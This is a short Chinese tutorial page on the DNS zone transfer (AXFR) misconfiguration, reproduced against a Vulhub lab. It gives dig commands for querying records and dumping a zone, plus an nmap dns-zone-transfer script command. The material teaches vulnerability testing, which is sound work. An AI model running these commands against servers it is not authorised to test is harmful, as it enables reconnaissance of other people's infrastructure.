您好,登錄后才能下訂單哦!
漏洞原理:
DNS協議支持使用axfr類型的記錄進行區域傳送,用來解決主從同步的問題。如果管理員在配置DNS服務器的時候沒有限制允許獲取記錄的來源,將會導致DNS域傳送漏洞。
漏洞復現:
1.在Linux下,我們可以使用dig命令來發送dns請求。我們可以用dig @your-ip www.vulhub.org獲取域名www.vulhub.org 來獲取目標dns服務器上的A記錄。
2.發送axfr類型的dns請求:dig @your-ip -t axfr vulhub.org
可見,我獲取到了vulhub.org的所有子域名記錄,這里存在DNS域傳送漏洞。
3.我們也可以用nmap script來掃描該漏洞:nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ip
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。